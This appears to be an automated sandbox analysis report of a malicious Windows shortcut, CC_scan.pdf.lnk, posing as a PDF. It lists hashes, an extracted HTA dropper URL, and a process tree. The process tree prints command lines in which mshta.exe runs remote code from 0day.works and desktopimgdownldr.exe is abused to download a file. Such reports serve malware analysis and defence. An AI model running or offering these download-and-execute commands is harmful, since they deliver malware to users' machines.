Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28-11-2024 17:01
Static task
static1
Behavioral task
behavioral1
Sample
CC_scan.pdf.lnk
Resource
win7-20240903-en
windows7-x64
3 signatures
150 seconds
General
-
Target
CC_scan.pdf.lnk
-
Size
1KB
-
MD5
95bfcc2eac48c76681aa2d97a5674201
-
SHA1
f72d50b2bba6e479ec106ae2f6fe993ab6eef99a
-
SHA256
f35bc7fcf73829f246b7c900600d04ceb38812f5407970daa1c5dfe1954ff478
-
SHA512
952485dbd0096257ab62ef2fa684d1333fa1e495ad29d8e7a8aaa41d6b316abb48ca5ad2c1b704db7e5bc346a8350039a059c7d5ad323b072ecd3911ac4c5925
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://0day.works/a
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
mshta.exeflow pid Process 5 2924 mshta.exe 7 2924 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exemshta.exedescription pid Process procid_target PID 328 wrote to memory of 2924 328 cmd.exe 31 PID 328 wrote to memory of 2924 328 cmd.exe 31 PID 328 wrote to memory of 2924 328 cmd.exe 31 PID 2924 wrote to memory of 2580 2924 mshta.exe 34 PID 2924 wrote to memory of 2580 2924 mshta.exe 34 PID 2924 wrote to memory of 2580 2924 mshta.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\CC_scan.pdf.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:328 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://0day.works/a2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c set "SYSTEMROOT=C:\Windows\Temp" && desktopimgdownldr.exe /deskimgurl:https://0day.works/null /eventName:desktopimgdownldr3⤵PID:2580
-
-